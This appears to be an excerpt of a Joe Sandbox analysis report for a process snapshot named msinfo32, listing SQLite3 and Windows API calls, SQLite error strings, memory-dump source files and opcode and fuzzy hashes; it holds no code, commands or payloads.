                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E90EC1
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E90ED6
                                                                                                                • Part of subcall function 61E397B2: memcmp.MSVCRT ref: 61E39800
                                                                                                                • Part of subcall function 61E397B2: sqlite3_malloc64.SQLITE3 ref: 61E39834
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E9185D
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E918A7
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E918F1
                                                                                                              • sqlite3_create_function.SQLITE3 ref: 61E919A1
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E91AE5
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E91107
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_errcode.SQLITE3 ref: 61E91AED
                                                                                                              • sqlite3_close.SQLITE3 ref: 61E91AFE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E91B1B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                                                                              • String ID: @a$@Ua$BINARY$NOCASE$RTRIM$`ta$fts3$fts4$fts5$fts5vocab$porter$rtree$rtree_i32$simple$unicode61$a$Ta$Ta
                                                                                                              • API String ID: 1097977795-2533187458
                                                                                                              • Opcode ID: 14cd9d35746f1733d41ad7436da480a33a77f7c356f942ae2c5745e97ab3b4b0
                                                                                                              • Instruction ID: 82ca588fe3cbcb135a8354ee25c951bac35916a6548e3bc6c60a8b60e82427c9
                                                                                                              • Opcode Fuzzy Hash: 14cd9d35746f1733d41ad7436da480a33a77f7c356f942ae2c5745e97ab3b4b0
                                                                                                              • Instruction Fuzzy Hash: 727205B0A083458FE700DFA5C59574ABBF5BF85358F25CC2CE8998B385D7B9C8458B82

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetSystemInfo.KERNEL32(?,?,61EAB400,?,61E18F13,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19160
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E19176
                                                                                                                • Part of subcall function 61E190E3: sqlite3_initialize.SQLITE3(?,?,61E1917B), ref: 61E190EE
                                                                                                                • Part of subcall function 61E190E3: sqlite3_mutex_enter.SQLITE3(?,?,61E1917B), ref: 61E19106
                                                                                                                • Part of subcall function 61E190E3: sqlite3_mutex_leave.SQLITE3(?), ref: 61E19138
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E1918A
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E1919E
                                                                                                              • sqlite3_vfs_register.SQLITE3 ref: 61E191B2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 3532963230-0
                                                                                                              • Opcode ID: 282d0988b0c4c7e78b141074b24d0402e11fb334742730bcea6bcf35f9c03c22
                                                                                                              • Instruction ID: 10c7b98b55687f49e46c00f7623be2acc4b57e71823a67b1cc0d3fe22570e2a5
                                                                                                              • Opcode Fuzzy Hash: 282d0988b0c4c7e78b141074b24d0402e11fb334742730bcea6bcf35f9c03c22
                                                                                                              • Instruction Fuzzy Hash: C0F0BDB191C748EBD700AF74C51771ABEE5AF85708F21C82CD0858B294D7B6D8449B93
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                                              • String ID: -journal$@
                                                                                                              • API String ID: 42632313-41206085
                                                                                                              • Opcode ID: 3255f426f881b5a4d88199e0c4c349b8d64c9bd81d8a6ca3e28b350844d10c37
                                                                                                              • Instruction ID: d477e686d99d46fd763196982faa52e552c98c65023e42cc72f671c95e0e340d
                                                                                                              • Opcode Fuzzy Hash: 3255f426f881b5a4d88199e0c4c349b8d64c9bd81d8a6ca3e28b350844d10c37
                                                                                                              • Instruction Fuzzy Hash: 6882F374A042598FEB20CF68C884B89BBF1BF49308F29C5E9D8489B352D774D985CF91

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18E20
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18E2D
                                                                                                              • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18EC1
                                                                                                              • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18EE7
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18F09
                                                                                                              • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18F0E
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18FEA
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18FF5
                                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19011
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19026
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                              • String ID: ya$@va$`"a
                                                                                                              • API String ID: 1590227068-2034376612
                                                                                                              • Opcode ID: 1bcada807b86994f73520025c62b58d360d1fe391b687516e7b23a4db1a4f56e
                                                                                                              • Instruction ID: 890ebe68101173dc46e5b745ce73d43d8d63bd8e5afb6a46cdd49cc9ef25f445
                                                                                                              • Opcode Fuzzy Hash: 1bcada807b86994f73520025c62b58d360d1fe391b687516e7b23a4db1a4f56e
                                                                                                              • Instruction Fuzzy Hash: 5B8162B4A18B098FDB409FA4C455B5A7AF5BB4A318F28C82ED445CB394E779C8C5EB01

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D54B
                                                                                                                • Part of subcall function 61E3D1EC: sqlite3_free.SQLITE3 ref: 61E3D25E
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3D578
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D5DD
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D5E8
                                                                                                              • sqlite3_win32_is_nt.SQLITE3 ref: 61E3D65D
                                                                                                              • CreateFileW.KERNEL32 ref: 61E3D69D
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D7D8
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D7E3
                                                                                                                • Part of subcall function 61E185E6: sqlite3_win32_sleep.SQLITE3 ref: 61E1863E
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D877
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D882
                                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3D8C0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                                                                              • String ID: winOpen
                                                                                                              • API String ID: 1995518269-2556188131
                                                                                                              • Opcode ID: 97b614f013a4bda29f98bb49165e4da93b674d66b617b0f273ff8456119eea12
                                                                                                              • Instruction ID: 4542847a82b68db2e473daaec3db2f18481b53a09b4235cdb7f4be34746d5da9
                                                                                                              • Opcode Fuzzy Hash: 97b614f013a4bda29f98bb49165e4da93b674d66b617b0f273ff8456119eea12
                                                                                                              • Instruction Fuzzy Hash: 5BD1B4749047599FEB10DFA9C58478EBBF0BF84318F208929E8A8DB394E774D945CB41

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              • sqlite_master, xrefs: 61E633EE
                                                                                                              • sqlite_temp_master, xrefs: 61E633F4
                                                                                                              • unsupported file format, xrefs: 61E63595
                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 61E6352B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                                              • API String ID: 0-2834926380
                                                                                                              • Opcode ID: 0b568db154cd19eaffe161a9cadbb8c070451ef4390c34598e7d39c559a80e4b
                                                                                                              • Instruction ID: eef8def05d42d143e2e428f23c2d65052eb7c545d227e98bc7cc05d9ceee79b4
                                                                                                              • Opcode Fuzzy Hash: 0b568db154cd19eaffe161a9cadbb8c070451ef4390c34598e7d39c559a80e4b
                                                                                                              • Instruction Fuzzy Hash: EEA10E70A443888BDB10CFA8C484B8EBBF5AF89318F60C56DD859AB395D775E845CF81

                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_mutex_try
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2794522359-4108050209
                                                                                                              • Opcode ID: 5ed16f86a59463aabcc951d3e907a0842d206bd7774ab0ad4bc6fd959a77f382
                                                                                                              • Instruction ID: 6c19f7d6379cac908fff080b0d47af8c351b558462f8d3e6343380c27459ba64
                                                                                                              • Opcode Fuzzy Hash: 5ed16f86a59463aabcc951d3e907a0842d206bd7774ab0ad4bc6fd959a77f382
                                                                                                              • Instruction Fuzzy Hash: 51127870A082558FEB15CFA8D484BD9BBF0AF98308F24C5A9E855DB392D774E885CF50

                                                                                                              APIs
                                                                                                              • sqlite3_strnicmp.SQLITE3 ref: 61E63CAB
                                                                                                                • Part of subcall function 61E03ED7: sqlite3_stricmp.SQLITE3 ref: 61E03F0C
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                                                                                              • String ID: no such table$no such view
                                                                                                              • API String ID: 456569458-301769730
                                                                                                              • Opcode ID: 0fbb3ff2c7f5a02b90848f1cdd3611e53906e71844e905e555df9113e5e5e5ec
                                                                                                              • Instruction ID: a8e0e9edd152b68eee42def08ff8a31a4a7c7e0e4677239ae18e48ee117670e4
                                                                                                              • Opcode Fuzzy Hash: 0fbb3ff2c7f5a02b90848f1cdd3611e53906e71844e905e555df9113e5e5e5ec
                                                                                                              • Instruction Fuzzy Hash: B1712370A483459BDB04CFA9C880B4ABBFABF89308F64C82DE8599B355D734D851CB91

                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID: winRead
                                                                                                              • API String ID: 2738559852-2759563040
                                                                                                              • Opcode ID: 3f93d09187f2af1fc2446ced1509e383606236e4975ebb1f636e43147f67869b
                                                                                                              • Instruction ID: 31cea667895dd336cc7c2e2ae5cf513e652dc955f815e8708f6abe00e0b0d86b
                                                                                                              • Opcode Fuzzy Hash: 3f93d09187f2af1fc2446ced1509e383606236e4975ebb1f636e43147f67869b
                                                                                                              • Instruction Fuzzy Hash: 4A41D271A01299DBCF44CFA8D89058EBBF2FF88314F65C629EC58A7344D730E9528B91

                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E10C30
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E10CD8
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              • Opcode ID: d1a762c95fc12d369821e2391bfc047a24cb4e8f9bd99dfb06df9921a6f23563
                                                                                                              • Instruction ID: e69b2ff03aa7064101020bd6fd507057f3620fef74c92f0b5a47c9470994e91e
                                                                                                              • Opcode Fuzzy Hash: d1a762c95fc12d369821e2391bfc047a24cb4e8f9bd99dfb06df9921a6f23563
                                                                                                              • Instruction Fuzzy Hash: EC219131E24B098BDB049FB9888531D7AE5BB8A319F25C62AD854C7384D7B8C8D58F41

                                                                                                              Similarity
                                                                                                              • API ID: mallocsqlite3_log
                                                                                                              • String ID:
                                                                                                              • API String ID: 2785431543-0

                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2313487548-0
                                                                                                              APIs
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E23686
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E236A6
                                                                                                              • sqlite3_value_blob.SQLITE3 ref: 61E236B3
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E236CA
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E2371A
                                                                                                              • sqlite3_result_text64.SQLITE3 ref: 61E2386A
                                                                                                              • sqlite3_result_blob64.SQLITE3 ref: 61E238C4
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 3992148849-0
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_malloc64$memcmpsqlite3_freesqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 1852262425-0
                                                                                                              APIs
                                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 61E91EC9
                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EDA
                                                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EE2
                                                                                                              • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EEA
                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E91EF9
                                                                                                              Similarity
                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 1445889803-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E76773
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E76983
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID: BINARY$INTEGER
                                                                                                              • API String ID: 1477753154-1676293250
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E465F3
                                                                                                                • Part of subcall function 61E13D7F: sqlite3_mutex_try.SQLITE3(?,?,?,61E13DFF), ref: 61E13D1F
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4660C
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E46725
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E46B30
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                              • String ID:
                                                                                                              • API String ID: 2068833801-0
                                                                                                              APIs
                                                                                                              • sqlite3_bind_int64.SQLITE3 ref: 61E288D4
                                                                                                                • Part of subcall function 61E28702: sqlite3_mutex_leave.SQLITE3 ref: 61E28741
                                                                                                              • sqlite3_bind_double.SQLITE3 ref: 61E288F7
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_bind_double, sqlite3_bind_int64, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1465616180-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E28993
                                                                                                              • sqlite3_bind_zeroblob.SQLITE3 ref: 61E289B8
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E289D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_bind_zeroblob, sqlite3_mutex_enter, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2187339821-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E104F3
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E10556
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E1042B
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E10476
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_enter, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2839E: sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E28556
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1465156292-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2839E: sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E28807
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1465156292-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2839E: sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E286F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1465156292-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2839E: sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E28883
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1465156292-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2839E: sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E28741
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1465156292-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2839E: sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E2879A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1465156292-0
                                                                                                              APIs
                                                                                                              • sqlite3_bind_int64.SQLITE3 ref: 61E28770
                                                                                                                • Part of subcall function 61E28702: sqlite3_mutex_leave.SQLITE3 ref: 61E28741
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 3064317574-0
                                                                                                              • Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                                              • Instruction ID: abd1c8dc674daebb380a9ed89ac6cf75db79cb782a6bad35bfc0ec2107cfd714
                                                                                                              • Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                                              • Instruction Fuzzy Hash: B5D092B4909309AFCB00EF29C48684EBBE4AF88254F40C82DFC98C7350E274E8508F92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fe99dd488f8f8ad2b92952aec82dc289e8aab1b40138442d98c3cb0b9c02f0ee
                                                                                                              • Instruction ID: d7e6a651e30d26ce3bbd21648d39cdb26b7e82d5ebeaa5b9a7b3cb6addd74cd6
                                                                                                              • Opcode Fuzzy Hash: fe99dd488f8f8ad2b92952aec82dc289e8aab1b40138442d98c3cb0b9c02f0ee
                                                                                                              • Instruction Fuzzy Hash: EE014B71A0421D9BCF00CE4AE491ADEB7F5FB88364F64812AF91497381C335E912CBE0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf6c1bb4fe10067c7b947e7ee6005aa7af93a2e5c9633f12df9dfde0985a9788
                                                                                                              • Instruction ID: a8566f14cdf83b673edd96a6394227251c16be677d86bb4d12bd654830cd9411
                                                                                                              • Opcode Fuzzy Hash: cf6c1bb4fe10067c7b947e7ee6005aa7af93a2e5c9633f12df9dfde0985a9788
                                                                                                              • Instruction Fuzzy Hash: 26F039716482199BCB04CE49E4A0A9ABBE8FB08374F20C12BFC2587784C771E951CBD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
